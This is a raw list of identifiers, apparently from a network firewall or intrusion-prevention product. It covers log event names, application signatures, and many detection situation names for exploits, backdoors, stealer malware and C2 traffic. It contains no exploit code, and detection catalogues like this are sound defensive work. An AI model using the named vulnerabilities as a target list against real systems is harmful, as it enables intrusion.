FW_Cluster-Protocol-No-Multicast-IP-Found
FW_Cluster-Protocol-The-Interface-Has-No-IP-Address
FW_Communication-CA-Certificate-Error
FW_Communication-Client-Certificate-Error
FW_Communication-Client-Private-Key-Error
FW_Communication-Communication-Error
FW_Communication-Server-Certificate-Error
FW_Communication-Server-Private-Key-Error
FW_Connection-Closed
FW_Connection-Discarded
FW_Connection-Queued
FW_Connection-Tracking-Error-When-Serializing-For-State-Sync
FW_Connection-Tracking-Error-When-Unserializing-Sync-Data
FW_DHCP-DCHP-Relay-MVPN-Interface-Down
FW_DHCP-DHCP-ARP-Check
FW_DHCP-DHCP-Bound
FW_DHCP-DHCP-Event-Handling-Error
FW_DHCP-DHCP-Expire
FW_DHCP-DHCP-Fail
FW_DHCP-DHCP-Medium
FW_DHCP-DHCP-Message-From-Untrusted-Circuit-Discarded
FW_DHCP-DHCP-Message-Received
FW_DHCP-DHCP-Preinit
FW_DHCP-DHCP-Rebind
FW_DHCP-DHCP-Reboot
FW_DHCP-DHCP-Relay-Address-Not-Configured-Reply-Discarded
FW_DHCP-DHCP-Relay-Address-Spoofed-Request-Discarded
FW_DHCP-DHCP-Release
FW_DHCP-DHCP-Renew
FW_DHCP-DHCP-Reply-Received
FW_DHCP-DHCP-Reply-Sent
FW_DHCP-DHCP-Request-Forwarded
FW_DHCP-DHCP-Request-Received
FW_DHCP-DHCP-Request-Sent
FW_DHCP-DHCP-Timeout
FW_DHCP-DHCP-V6-Relay-Reply-Received
FW_DHCP-DHCP-V6-Relay-Req-Received
FW_DHCP-Failed-To-Add-Relay-Agent-Option-Request-Discarded
FW_DHCP-Hardware-Type-Mismatch-Request-Discarded
FW_DHCP-Illegal-DHCP-Message-Discarded
FW_DHCP-Illegal-DHCP-Reply-Discarded
FW_DHCP-Illegal-DHCP-Request-Discarded
FW_DHCP-Missing-Relay-Agent-Options-Reply-Discarded
FW_DHCP-Oversized-DHCP-Message-Discarded
FW_DHCP-Sending-DHCP-Reply-Failed
FW_DHCP-Sending-DHCP-Request-Failed
FW_DHCP-Unexpected-Relay-Agent-Options-Reply-Discarded
FW_DHCP-Unknown-DCHP-Relay-Error
FW_DHCP-Unsupported-DHCP-Event
FW_DHCP_server_lease_activated
FW_DHCP_server_lease_expired
FW_Dropped-AH-Packet
FW_Dropped-ESP-Packet
FW_Hybrid-Authentication-Done
FW_Hybrid-Authentication-Failed
FW_IGMPP-Group-dropped
FW_IGMPP-Max-memberships-limit-reached
FW_IGMPP-New-group-added
FW_IGMPP-Route-has-been-installed
FW_IGMPP-Route-has-been-removed
FW_IKE-Phase-1-Info
FW_IKE-Phase-2-Info
FW_Incomplete-Connection-Closed
FW_Info-Request
FW_Internal-Error
FW_IPsec
FW_IPsec-Authentication-Error
FW_IPsec-Configuration-Error
FW_IPsec-Critical-Error
FW_IPsec-Error
FW_IPsec-IKE-Error
FW_IPsec-IKE-Notification
FW_IPsec-Info
FW_IPsec-Notification
FW_IPsec-Warning
FW_License-Exceeded
FW_Log-System-Log-Spool-Corrupted
FW_Log-System-Log-Spool-Is-Becoming-Full
FW_NAT-No-Suitable-NAT-Rule-Found
FW_NAT-Requested-NAT-Cannot-Be-Done
FW_Netlink-Initializing-Raw-Socket
FW_Netlink-Initializing-Raw-Socket-Failed
FW_Netlink-Netlink-Start
FW_Netlink-Receive-ICMP-Echo
FW_Netlink-Send-ICMP-Echo
FW_Netlink-Send-Update-To-DNS-Server
FW_Netlink-Updating-DNS-Failed
FW_New-Connection
FW_New-IPsec-VPN-Connection
FW_New-Route-Based-VPN-Connection
FW_New-SSL-VPN-Connection
FW_New-VPN-Connection
FW_New-Web-Portal-SSL-VPN-Connection
FW_No-Suitable-NAT-Rule-Found-For-Related-Connection
FW_Notice
FW_Packet-Discarded
FW_Probe
FW_Protocol-Agent-ADDRESS-Block-Not-Found-From-TNS-Message
FW_Protocol-Agent-Application-Protocol-Data-Modification-Failed
FW_Protocol-Agent-Application-Protocol-Version-Is-Not-Supported
FW_Protocol-Agent-Application-Protocol-Version-Not-Recognised
FW_Protocol-Agent-Application-Protocol-Violation
FW_Protocol-Agent-Cannot-Access-Connection-State
FW_Protocol-Agent-Client-Application-Error
FW_Protocol-Agent-Configuration-Information-For-This-Connection
FW_Protocol-Agent-Connection-Cannot-Be-Redirected-To-Proxy-Server-Due-To-Absence-Of-Source-NAT-Rule
FW_Protocol-Agent-Connection-Redirected-To-Proxy-Server
FW_Protocol-Agent-Data-Connection-Cannot-Be-Redirected-To-Proxy-Server-Due-To-Absence-Of-Source-NAT-Rule
FW_Protocol-Agent-Data-Connection-Redirected-To-Proxy-Server
FW_Protocol-Agent-DESCRIPTION-Block-Not-Found-From-TNS-Message
FW_Protocol-Agent-Different-Version-Of-Synchronized-Connection-State
FW_Protocol-Agent-Error-While-Preparing-State-Synchronization
FW_Protocol-Agent-Error-While-Processing-Synchronized-State
FW_Protocol-Agent-Error-With-Proxy-Server
FW_Protocol-Agent-ERROR_STACK-Block-Not-Found-From-TNS-Error-Message
FW_Protocol-Agent-Failed-To-Allow-A-Related-Connection-To-Open
FW_Protocol-Agent-HOST-Block-Not-Found-From-TNS-Message
FW_Protocol-Agent-Illegal-Behaviour-Of-A-Client-Or-Server
FW_Protocol-Agent-Incompatible-Version-Of-A-Connection-State
FW_Protocol-Agent-Invalid-Properties-Of-Custom-Protocol-Agent
FW_Protocol-Agent-Invalid-Sun-RPC-Portmapper-Message
FW_Protocol-Agent-IP-In-TNS-Message-Changed
FW_Protocol-Agent-NAT-Rule-Matching-To-Related-Connection-Is-Unsuitable
FW_Protocol-Agent-No-NAT-Rule-Matching-To-Related-Connection
FW_Protocol-Agent-PA-Connection-State-Invalid
FW_Protocol-Agent-PA-State-Synchronization-Error
FW_Protocol-Agent-PORT-Block-Not-Found-From-TNS-Message
FW_Protocol-Agent-Port-In-TNS-Message-Changed
FW_Protocol-Agent-Proxy-Server-Registration-Error
FW_Protocol-Agent-Server-IP-From-Oracle-Listener-Is-Not-Allowed
FW_Protocol-Agent-Sun-RPC-Portmapper-Reply-Without-Corresponding-Call-Detected
FW_Protocol-Agent-TNS-Header-Checksum-Changed-To-0
FW_Protocol-Agent-TNS-Packet-Checksum-Changed-To-0
FW_Protocol-Agent-TNS-Packet-From-A-Wrong-Direction
FW_Protocol-Agent-TNS-Packet-Too-Long
FW_Protocol-Agent-TNS-Packet-Too-Short
FW_Protocol-Agent-TNS-Request-Too-Long
FW_Protocol-Agent-TNS-Request-Too-Short
FW_Protocol-Agent-TNS-Response-Too-Long
FW_Protocol-Agent-TNS-Response-Too-Short
FW_Protocol-Agent-Too-Many-Logical-Channels
FW_Protocol-Agent-Transport-Protocol-Violation
FW_Protocol-Agent-Unkonwn-TNS-Packet-Type
FW_Protocol-Agent-Unrecognized-Protocol
FW_Protocol-Agent-Unsupported-Client-Or-Server-Application
FW_Protocol-Agent-Unsupported-Client-Or-Server-Version
FW_Protocol-Agent-Unsupported-Protocol-Property
FW_Protocol-Agent-Unsupported-Version-Of-Sun-RPC-Portmapper-Call
FW_Reject-Web-Portal-SSL-VPN-Connection
FW_Rejected-IKE-Message
FW_Related-Connection
FW_Related-Packet
FW_Server-Pool-Message-From-Server-Pool-Member
FW_Server-Pool-Server-Pool-Member-Went-Offline
FW_Server-Pool-Server-Pool-Member-Went-Online
FW_Starting-Hybrid-Authentication
FW_Synchronization-Receiving-Sync-Messages
FW_Synchronization-Sending-Sync-Messages
FW_Synchronization-State-Sync-Communication-Discard-Incremental-Tuple
FW_Synchronization-State-Sync-Communication-Drop-Tuple
FW_Synchronization-State-Sync-Communication-Failure
FW_Synchronization-State-Sync-Communication-Install-Incremental-Tuple
FW_Synchronization-State-Sync-Communication-Install-Tuple
FW_Synchronization-State-Sync-Communication-Receive-Incremental-Tuple
FW_Synchronization-State-Sync-Communication-Receive-Tuple
FW_Synchronization-State-Sync-Communication-Send-Incremental-Tuple
FW_Synchronization-State-Sync-Communication-Send-Tuple
FW_Synchronization-State-Sync-Configuration-Changed
FW_Synchronization-State-Sync-Failed-To-Allocate-Resource
FW_Synchronization-State-Sync-Failed-To-Initialize
FW_Synchronization-State-Sync-Failed-To-Initialize-Kernel-Interface
FW_Synchronization-State-Sync-Failed-To-Receive
FW_Synchronization-State-Sync-Failed-To-Reinitialize
FW_Synchronization-State-Sync-Failed-To-Send-Sync-Message
FW_Synchronization-State-Sync-Failed-To-Set-Configuration
FW_Synchronization-State-Sync-Internal-Communication-Error
FW_Synchronization-State-Sync-Invalid-Command
FW_Synchronization-State-Sync-Kernel-Event
FW_Synchronization-State-Sync-Key-Changed
FW_Synchronization-State-Sync-Key-Management-Failure
FW_System-Authentication-Error
FW_System-Communication-Failure
FW_System-Configuration-Changed
FW_System-Connection-Refused
FW_System-Data-Corrupted
FW_System-Device-Or-Resource-Busy
FW_System-Failed-To-Allocate-Resource
FW_System-Failed-To-Execute-A-Command
FW_System-Failed-To-Initialize
FW_System-Failed-To-Initialize-Kernel-Interface
FW_System-Failed-To-Receive
FW_System-Failed-To-Reinitialize
FW_System-Failed-To-Send
FW_System-Failed-To-Send-Command-To-Kernel
FW_System-Failed-To-Set-Configuration
FW_System-File-Not-Found
FW_System-Incorrect-Address
FW_System-Invalid-Argument
FW_System-Invalid-Checksum
FW_System-Invalid-Command
FW_System-Invalid-Configuration
FW_System-Invalid-Options
FW_System-Invalid-Packet
FW_System-IO-Error
FW_System-Key-Exchange
FW_System-Key-Management-Failure
FW_System-Load-Balancing
FW_System-Memory-Allocation-Failed
FW_System-Network-Is-Unreachable
FW_System-No-Buffer-Space-Available
FW_System-No-Response
FW_System-No-Route-To-Host
FW_System-No-Space-Left-On-Device
FW_System-No-Such-Device-Found
FW_System-Node-Booted
FW_System-Node-Down
FW_System-Node-Up
FW_System-Operation-Not-Supported
FW_System-Packet-Too-Long
FW_System-Packet-Too-Short
FW_System-Permission-Denied
FW_System-Protocol-Not-Supported
FW_System-Queue-Is-Full
FW_System-Security-Policy-Reload
FW_System-Timeout
FW_UA-Agent-failover
FW_UA-User-disconnected
FW_UA-User-logoff
FW_UA-User-logon
FW_WIFI_AP-Client-authentication-failed
FW_WIFI_AP-Client-authentication-success
FW_WIFI_AP-Client-authorization-failed
FW_WIFI_AP-Client-authorization-success
FW_WIFI_AP-Client-deauthenticated
FW_WIFI_AP-Client-deauthorized
FW_WIFI_AP-Client-disassiociated
FW_WIFI_AP-Client-MAC-address-blocked
FW_WIFI_AP-Client-MAC-address-not-allowed
FW_WIFI_AP-Client-successfully-associated
FW_WIFI_AP-DFS-scan-ready
FW_WIFI_AP-DFS-scan-still-running
G-Cloud
G-Suite-by-Google
G2Crowd
Gadu-Gadu
Gafachi
Gage-Control
Gaia-Online
Gainsight
Gallup.Com
Gamasutra
Gambling
Game-Design
Gamebattles
GameBuilder
Gamedesire
Gamefaqs
Gameforge
Gamehouse
Gameknot-Chess
Gameloft
Gameloft-Asphalt7
Games
Games-2-Download
Games-Radar-Us
Gamesfreak
Gamespot
Gamespy
Gamestats
Gamezone
GAM_Bad-Archive
GAM_Bad-Certificate
GAM_Bad-Xml-Response
GAM_Db-Download-Ok
GAM_Deinitialize-Error
GAM_Deinitialize-Ok
GAM_Download-Error
GAM_Download-Started
GAM_Initialize-Error
GAM_Initialize-Ok
GAM_No-Space
GAM_Scan-Failed
GAM_Server-Connection-Error
GAM_Server-Response-Error
GandA-Manager
Gandi.net
Ganttic
Gapertise
Garage
Garena
Garmin
Garmin Connect Mobile
Garmin Express
Garmin-Connect
Gartner
GatherContent
Gatherplace
Gay or Lesbian or Bisexual Interest
GE-CreditLine-Online-Service-Centre
Ge.tt
Geckoboard
Geelus
Geenio
Geezeo
Geico-Online-Service-Center
Gem-Accounts
Gemfury
Geminare
Gemini
Genbook
General Email
Generate a certificate signed by new VPN Certificate Authority and refresh the policy
Generic Protocol Application Stop Condition
Generic Web Application Stop Condition
Generic-TLS
Generic-TLS-1.0
Generic-TLS-1.1
Generic-TLS-1.2
Generic-TLS-1.3
Generic-Web-HTTP
Generic-Web-TLS
Generic-Web-TLS-1.0
Generic-Web-TLS-1.1
Generic-Web-TLS-1.2
Generic-Web-TLS-1.3
Generic_Arkeia-Network-Backup-Server-Type77-Stack-BOF-1
Generic_Arkeia-Network-Backup-Server-Type77-Stack-BOF-2
Generic_Arkeia-Network-Backup-Server-Type77-Stack-BOF-3
Generic_BakBone-NetVault-Heap-BOF
Generic_BakBone-NetVault-Heap-BOF-2
Generic_Borland-Interbase-Database-Service-Malformed-Request-BOF-2
Generic_Borland-Interbase-Database-Service-Malformed-Request-Buffer-Overflow
Generic_Borland-Interbase-Integer-Overflow
Generic_BrightStor-Arcserve-Enterprise-Backup-Discovery-Service-BOF
Generic_CA-BrightStor-Arcserve-Backup-Portmapper-TADDR2UADDR-DOS
Generic_CA-BrightStor-Arcserve-Enterprise-Backup-UDP-BOF
Generic_CA-License-Client-Getconfig-BOF
Generic_CA-License-Client-PUTOLF-Request-Directory-Traversal
Generic_CA-License-Server-Getconfig-BOF
Generic_CA-License-Software-GCR-Buffer-Overflow
Generic_CA-License-Software-Invalid-Command-Buffer-Overflow
Generic_CA-License-Software-PUTOLF-Buffer-Overflow
Generic_CA-Message-Queuing-BOF
Generic_CA-Multiple-Products-Console-Server-Login-Credentials-Handling-BOF
Generic_Cisco-Unified-Communications-Manager-CTL-Provider-Heap-Overflow
Generic_Citadel-UX-Lprintf-Function-Format-String
Generic_Citrix-Presentation-Server-IMA-Invalid-Event-Data-Length-DOS
Generic_Citrix-Provisioning-Services-Opcode-40020006-Integer-Underflow
Generic_Citrix-Provisioning-Services-Opcode-40020010-Stack-Buffer-Overflow
Generic_CS-7t-Interactive-Graphical-SCADA-Arbitrary-File-Execution
Generic_CS-7t-Interactive-Graphical-SCADA-Arbitrary-File-Read-And-Overwrite
Generic_CS-7t-Interactive-Graphical-SCADA-File-Operations-Buffer-Overflows
Generic_CS-ABB-Microscada-Wserver-Multiple-Vulnerabilities
Generic_CS-ABB-Microscada-Wserver-Multiple-Vulnerabilities-2
Generic_CS-Acronis-Cyber-Infrastructure-Default-Password-RCE
Generic_CS-ActFax-Raw-Server-Buffer-Overflow
Generic_CS-Adbopebot-Trojan
Generic_CS-Adobe-ColdFusion-CVE-2019-7839-Remote-Code-Execution
Generic_CS-Adobe-ColdFusion-CVE-2022-35690-ODBC-Agent-Memory-Corruption
Generic_CS-Adroit-SCADA-Intelligence-Server-DoS
Generic_CS-Aerospike-Database-Server-As_Sindex-Simatch_By_Iname-Stack-Buffer-Overflow
Generic_CS-Aerospike-Database-Server-Rw-Fabric-Message-Code-Execution
Generic_CS-Aerospike-Database-Server-Stack-Buffer-Overflow-CVE-2016-9054
Generic_CS-AgentX++-Receive-PDU-Integer-Overflow
Generic_CS-Agentx-Receive-Stack-Buffer-Overflow
Generic_CS-Ainslot.b-Traffic
Generic_CS-AIS-logistics-ESEL-Server-RCE
Generic_CS-Alienvault-Ossim-Framework-Backup-Command-Execution
Generic_CS-Alienvault-Unified-Security-Management-AV-Forward-Deserialization-Remote-Code-Execution
Generic_CS-Allen-Bradley-PCCC-Protocol-DoS
Generic_CS-ALLMediaServer-SEH-Buffer-Overflow
Generic_CS-Alt-N-MDaemon-Worldclient-Service-Memory-Corruption
Generic_CS-Alusins.A-Traffic
Generic_CS-Amcrest-Dahua-NVR-Camera-Denial-Of-Service
Generic_CS-AmmSoft-ScriptFTP-Buffer-Overflow
Generic_CS-ANT-Studio-Web-Server-Denial-Of-Service
Generic_CS-Apache-Activemq-Jmx-Rmiconnectorserver-Remote-Code-Execution
Generic_CS-Apache-Activemq-OpenWire-Insecure-Deserialization-CVE-2023-46604
Generic_CS-Apache-Activemq-Shutdown-Command-Denial-Of-Service
Generic_CS-Apache-Airflow-Celery-Broker-RCE-CVE-2020-11981
Generic_CS-Apache-Couchdb-Erlang-RCE
Generic_CS-Apache-James-Server-Insecure-User-Creation
Generic_CS-Apache-Log4j-SocketServer-Untrusted-Deserialization
Generic_CS-Apache-OpenMeetings-Cluster-Mode-Insecure-Deserialization-CVE-2024-54676
Generic_CS-Apache-Pulsar-JSON-Web-Token-Authentication-Bypass
Generic_CS-Apache-Qpid-Sequence-Set-Denial-Of-Service
Generic_CS-Apache-Qpid-Session.gap-Denial-Of-Service
Generic_CS-Apache-RocketMQ-Buildstartcommand-Command-Injection
Generic_CS-Apache-RocketMQ-Nameserver-configStorePath-Arbitrary-File-Write
Generic_CS-Apache-Spark-Auth-enabled-Standalone-Master-Command-Execution
Generic_CS-Apache-Storm-Gettopologyhistory-Command-Injection
Generic_CS-Apache-Tomcat-ajp-Local-File-Inclusion
Generic_CS-Appian-Enterprise-Business-Suite-DoS
Generic_CS-Arkeia-Network-Backup-Server-Buffer-Overflow
Generic_CS-Artica-Proxy-Squid.conf-Authentication-Bypass
Generic_CS-Asterisk-AMI-Originate-Authenticated-RCE
Generic_CS-Asterisk-Skinny-Channel-Driver-Remote-Denial-of-Service-Vulnerability
Generic_CS-Asterisk-Skinny-Channel-Get-Input-Integer-Overflow
Generic_CS-Asus-Remote-Console-DPC-Proxy-Server-Buffer-Overflow
Generic_CS-Atlassian-JIRA-And-Service-Management-Ehcache-Rmi-Insecure-Deserialization
Generic_CS-Autonomy-Connected-Backup-Type-13-Command-Injection
Generic_CS-AveMaria-Stealer-C2-Traffic
Generic_CS-Avid-Media-Composer-Stack-Based-Buffer-Overflow
Generic_CS-B-Labs-Bopup-Communication-Server-Stack-Based-Buffer-Overflow
Generic_CS-B-Labs-Bopup-Communication-Server-Stack-Based-Buffer-Overflow-2
Generic_CS-Bea-WebLogic-SSL-Handling-Denial-Of-Service
Generic_CS-Berlios-GPSD-Format-String-Vulnerability
Generic_CS-BigAnt-Buffer-Overflow
Generic_CS-BigAnt-IM-Server-2.2-Buffer-Overflow
Generic_CS-BigAnt-Server-Ddnf-Request-Stack-Buffer-Overflow
Generic_CS-BigAnt-Server-Dupf-Command-Arbitrary-File-Upload
Generic_CS-BigAnt-Server-SCH-Request-Stack-Buffer-Overflow
Generic_CS-Blizzard-World-Of-Warcraft-Login
Generic_CS-Blue-Coat-Authentication-Proxy-Buffer-Overflow
Generic_CS-Blue-Coat-BCAAA-Stack-Buffer-Overflow
Generic_CS-Bmc-BladeLogic-Server-Automation-RSCD-Agent-RCE
Generic_CS-Bmc-Patrol-Agent-Command-Execution
Generic_CS-Bmc-Track-It-Arbitrary-File-Upload
Generic_CS-Borland-Interbase-Database-Message-Handling-Buffer-Overflow
Generic_CS-Borland-Interbase-INET-Connect-Buffer-Overflow
Generic_CS-Borland-Interbase-Isc-Attach-And-Create-Database-Buffer-Overflow
Generic_CS-Borland-Interbase-Jrd8-Create-Database-Buffer-Overflow
Generic_CS-Borland-Interbase-SVC-Attach-Buffer-Overflow
Generic_CS-Borland-Software-Interbase-ibserver.exe-Service-Attach-Request-BOF
Generic_CS-Botnet-Al3na.weakpatheticfool-Activity
Generic_CS-Botnet-Esbot-Activity
Generic_CS-Broadwin-WebAccess-Denial-Of-Service
Generic_CS-CA-Arcserve-Backup-For-Laptops-And-Desktops-Lgserver-Buffer-Overflow
Generic_CS-CA-Arcserve-Backup-For-Windows-BOF
Generic_CS-CA-BrightStor-Arcserve-Backup-Lgserver-Buffer-Overflow
Generic_CS-CA-BrightStor-HSM-Buffer-Overflow
Generic_CS-CA-eTrust-Intrusion-Detection-Encryption-Key-Handling-Denial-Of-Service
Generic_CS-CA-Products-Discovery-Service-Buffer-Overflow
Generic_CS-CA-Products-Message-Queuing-Server-Buffer-Overflow
Generic_CS-Certec-atvise-atserver-Denial-of-Service
Generic_CS-Cesanta-Mongoose-MQTT-Subscribe-Multiple-Topics-RCE-CVE-2017-2894
Generic_CS-Cesanta-Mongoose-Parse_MQTT-DOS
Generic_CS-Cesanta-Mongoose-Parse_MQTT-Out-Of-Bounds-Read
Generic_CS-CHAOS-RAT-Infection-Traffic
Generic_CS-Cisco-CallManager-Malformed-UpdateCapabilities
Generic_CS-Cisco-CNS-Network-Registrar-Denial-Of-Service
Generic_CS-Cisco-Router-SYNful-Knock-Command
Generic_CS-Cisco-Security-Manager-Rmi-Insecure-Deserialization
Generic_CS-Cisco-Unified-Contact-Center-Express-Rmi-Insecure-Deserialization
Generic_CS-CitectSCADA-ODBC-Service-Buffer-Overflow
Generic_CS-Citrix-IMA-Service-Buffer-Overflow
Generic_CS-Citrix-MetaFrame-IMA-Authentication-Processing-Buffer-Overflow
Generic_CS-Claymore-Dual-GPU-Miner-Format-String-DOS-Attack
Generic_CS-Cleartext-SIP-Commands-After-TLS-Handshake
Generic_CS-Cloudme-Sync-Stack-Based-Buffer-Overflow
Generic_CS-Codesys-Gateway-Server-DoS-Vulnerability
Generic_CS-Codesys-Gateway-Server-Opcode-0x3ef-Heap-Buffer-Overflow
Generic_CS-Codesys-V3-Cmprouter-And-Cmprouterembedded-Integer-Overflow
Generic_CS-Cogent-Datahub-Remote-Unicode-Buffer-Overflow
Generic_CS-Coinminer-Trojan-Traffic
Generic_CS-Computer-Associates-ARCserve-Backup-Discovery-Service-DoS
Generic_CS-Computer-Associates-iGateway-Buffer-Overflow
Generic_CS-Cstealer-Infection-Traffic
Generic_CS-Dahua-DVR-Auth-Bypass
Generic_CS-Dameware-Mini-Remote-Control-Server-Pre-Authentication-BOF
Generic_CS-DanaBot-C2-Traffic
Generic_CS-DATAC-Control-RealWin-SCADA-System-Crafted-Packet-Handling-BOF
Generic_CS-Dell-NetVault-Backup-Denial-Of-Service
Generic_CS-Dell-OpenManage-Web-Server-Buffer-Overflow
Generic_CS-Delta-Electronics-Industrial-Automation-Ahsim_5x0-Simulator-Buffer-Overflow
Generic_CS-Delta-Electronics-Infrasuite-Device-Master-Checkloadingstartupconfig-Directory-Traversal
Generic_CS-Delta-Electronics-Infrasuite-Device-Master-datacollect-Insecure-Deserialization
Generic_CS-Delta-Electronics-Infrasuite-Device-Master-Opcode-512-Directory-Traversal
Generic_CS-DEWESoft-X3-Internal-Command-Access-CVE-2018-7756
Generic_CS-Digium-Asterisk-Chan_Skinny-Sccp-Packet-Denial-Of-Service
Generic_CS-Digium-Asterisk-Manager-Shell-Command-Usage
Generic_CS-Digium-Asterisk-Skinny-Channel-Driver-Heap-Buffer-Overflow
Generic_CS-Digium-Asterisk-Skinny-Channel-Null-Pointer-Dereference
Generic_CS-Digium-Multiple-Asterisk-Products-Skinny-Channel-Driver-Denial-of-Service
Generic_CS-Disk-Savvy-Enterprise-Stack-Buffer-Overflow
Generic_CS-distcc-Remote-Shell-Execution
Generic_CS-Django-Multipartparser-Infinite-Loop-DoS
Generic_CS-Donbot-Spambot
Generic_CS-Dopewars-Denial-of-Service
Generic_CS-Dorkbot-Traffic
Generic_CS-DoublePulsar-Shellcode
Generic_CS-Ebury-SSH-Backdoor-Activity
Generic_CS-Eclipse-Equinoxe-OSGi-Console-Command-Execution
Generic_CS-Eclipse-Mosquitto-ACL-Bypass-CVE-2017-7650
Generic_CS-Eclipse-Mosquitto-MQTT-Subscribe-Topic-Stack-Overflow
Generic_CS-eIQnetworks-ESA-Buffer-Overflow
Generic_CS-Embarcadero-Interbase-ConnReq-Stack-Buffer-Overflow
Generic_CS-EMC-Alphastor-3.1-Buffer-Overflow
Generic_CS-EMC-Alphastor-Device-Manager-0x41-Command-Buffer-Overflow
Generic_CS-EMC-Alphastor-Device-Manager-Command-Injection
Generic_CS-EMC-Alphastor-Device-Manager-Format-String-Vulnerability
Generic_CS-EMC-Alphastor-Library-Control-Program-Multiple-Buffer-Overflows
Generic_CS-EMC-Autostart-Error-Logging-Stack-Buffer-Overflow
Generic_CS-EMC-Autostart-Ftagent-Opcode-20-Subcode-2060-Remote-Command-Execution
Generic_CS-EMC-Autostart-Ftagent-Opcode-20-Subcode-2219-Remote-Command-Execution
Generic_CS-EMC-Autostart-Ftagent-Opcode-83-Subcode-22-SQL-Injection
Generic_CS-EMC-Autostart-Ftagent-Opcode-85-Subcode-33-SQL-Injection
Generic_CS-EMC-Autostart-Ftagent.exe-Multiple-Integer-Overflow-Vulnerabilities
Generic_CS-EMC-Autostart-Ftagent.exe-Null-Byte-Write
Generic_CS-EMC-Dantz-Retrospect-Backup-Agent-Denial-Of-Service
Generic_CS-EMC-Data-Protection-Advisor-Denial-Of-Service
Generic_CS-EMC-Replication-Manager-Command-Execution
Generic_CS-EMC-RepliStor-Rep_Srv-And-Ctrlservice-Denial-Of-Service
Generic_CS-Energizer-Duo-USB-Charger-Backdoor-Access
Generic_CS-Famatech-Radmin-Client-Connection-Attempt
Generic_CS-File-Replication-Pro-execCommand-Command-Execution
Generic_CS-Finfisher-Spyware-Traffic
Generic_CS-Firebird-Database-Server-Username-Handling-Buffer-Overflow
Generic_CS-Firebird-SQL-CNCT-Group-Number-BOF-1
Generic_CS-Firebird-SQL-CNCT-Group-Number-BOF-2
Generic_CS-Firebird-Xdr-Operation-Request-Handling-Denial-Of-Service
Generic_CS-Fishbowl-Inventory-Fishbowl-Server-decodeObject-Insecure-Deserialization
Generic_CS-FlawedAmmyy-RAT-C2-Traffic
Generic_CS-Flexera-Flexnet-Publisher-License-Server-Buffer-Overflow
Generic_CS-Flexera-Flexnet-Publisher-License-Server-Heap-Buffer-Overflow
Generic_CS-Flexera-Flexnet-Publisher-License-Server-Heap-Buffer-Overflow-2
Generic_CS-Flexera-Flexnet-Publisher-License-Server-Manager-Lmgrd-Stack-BOF
Generic_CS-Fortinet-ForticlientEMS-SQL-Injection-CVE-2023-48788
Generic_CS-Fortinet-Fortimanager-Fgfmsd-Missing-Authentication-Command-Injection
Generic_CS-Fortinet-FortiOS-Format-String-CVE-2024-23113
Generic_CS-Fortinet-Fortisiem-Command-Injection-CVE-2023-34992
Generic_CS-Fortinet-Fortisiem-Command-Injection-CVE-2024-23108
Generic_CS-Fortinet-Multiple-Products-Csfd-Directory-Traversal-CVE-2024-48884
Generic_CS-Fortinet-Single-Sign-On-Hello-Message-Denial-Of-Service
Generic_CS-Fortinet-Single-Sign-On-Hello-Message-Stack-Buffer-Overflow
Generic_CS-Fortra-FileCatalyst-Workflow-HSQLDB-Default-Credentials-CVE-2024-6633
Generic_CS-FreeBSD-Delegate-Proxy-BOF-1
Generic_CS-FreeBSD-Delegate-Proxy-BOF-2
Generic_CS-FreeBSD-NFS-Server-Nfsm_advance-Denial-Of-Service
Generic_CS-FreeBSD-NFS-Server-Nfsrvd_readdirplus-Denial-Of-Service
Generic_CS-FreeBSD-NFS-Server-Nfsv4-Opcode-Out-Of-Bounds-Write
Generic_CS-FreeBSD-Nfs-Server-Readdir-Request-Memory-Corruption
Generic_CS-FreeSWITCH-Event-Socket-Command-Execution
Generic_CS-FTP-Traffic-Over-Non-Standard-Port
Generic_CS-Gafgyt-Linux-Infection-Traffic
Generic_CS-Galaxy-Store-Improper-Access-Control-CVE-2023-21433
Generic_CS-Galil-RIO-DoS-CVE-2013-0699
Generic_CS-Ganglia-Meta-Daemon-Process-Path-Stack-Buffer-Overflow
Generic_CS-GE-Mds-Pulsenet-Remote-Invocation-Insecure-Deserialization
Generic_CS-GE-Proficy-Historian-ihDataArchiver-Buffer-Overflow
Generic_CS-GE-Proficy-Real-Time-Information-Portal-Directory-Traversal
Generic_CS-Genbroker-Service-Denial-Of-Service
Generic_CS-Geutebrueck-GCore-GCoreServer.exe-Buffer-Overflow
Generic_CS-Ghost-Activity
Generic_CS-GIMP-script-fu-Server-Buffer-Overflow
Generic_CS-Git-Git-Source-Code-Management-gitattributes-Integer-Overflow
Generic_CS-Glutton-Backdoor-C2-Traffic
Generic_CS-GnuTLS-TLS-Record-GenericBlockCipher-Parsing-Integer-Overflow
Generic_CS-Goofygobot-Linux-Infection-Traffic
Generic_CS-Hamweq-Bot-Traffic
Generic_CS-Hiddentear-Worm-Infection-Traffic
Generic_CS-Hikvision-DVR-Buffer-Overflow
Generic_CS-Honeywell-UniSim-ShadowPlant-Bridge-DoS
Generic_CS-Host-Header-Localhost
Generic_CS-HP-Aio-Archive-Query-Server-Oasoa.exe-Stack-Buffer-Overflow
Generic_CS-HP-Data-Protector-Backup-Client-Get-File-Buffer-Overflow
Generic_CS-HP-Data-Protector-Backup-Client-Get-File-Buffer-Overflow-2
Generic_CS-HP-Data-Protector-Backup-Client-Get-File-Directory-Traversal
Generic_CS-HP-Data-Protector-Backup-Client-Service-Exec_Setup-Code-Execution
Generic_CS-HP-Data-Protector-Client-Exec_Cmd-Perl-Command-Execution
Generic_CS-HP-Data-Protector-Crs-Multiple-Opcodes-Stack-Buffer-Overflow
Generic_CS-HP-Data-Protector-Crs-Multiple-Stack-Buffer-Overflows
Generic_CS-HP-Data-Protector-Crs-Opcode-1091-Stack-Buffer-Overflow
Generic_CS-HP-Data-Protector-Crs-Opcode-1092-Stack-Buffer-Overflow
Generic_CS-HP-Data-Protector-Crs-Opcode-211-Stack-Buffer-Overflow
Generic_CS-HP-Data-Protector-Crs-Opcode-215-And-263-Stack-Buffer-Overflow
Generic_CS-HP-Data-Protector-Crs-Opcode-227-Stack-Buffer-Overflow
Generic_CS-HP-Data-Protector-Crs-Opcode-234-Stack-Buffer-Overflow
Generic_CS-HP-Data-Protector-Crs-Opcode-235-Stack-Buffer-Overflow
Generic_CS-HP-Data-Protector-Crs-Opcode-259-Stack-Buffer-Overflow
Generic_CS-HP-Data-Protector-Crs-Opcode-260-Stack-Buffer-Overflow
Generic_CS-HP-Data-Protector-Crs-Opcode-264-Stack-Buffer-Overflow
Generic_CS-HP-Data-Protector-Crs-Opcode-305-Stack-Buffer-Overflow
Generic_CS-HP-Data-Protector-Directory-Traversal
Generic_CS-HP-Data-Protector-Exec_Bar-Command-Execution
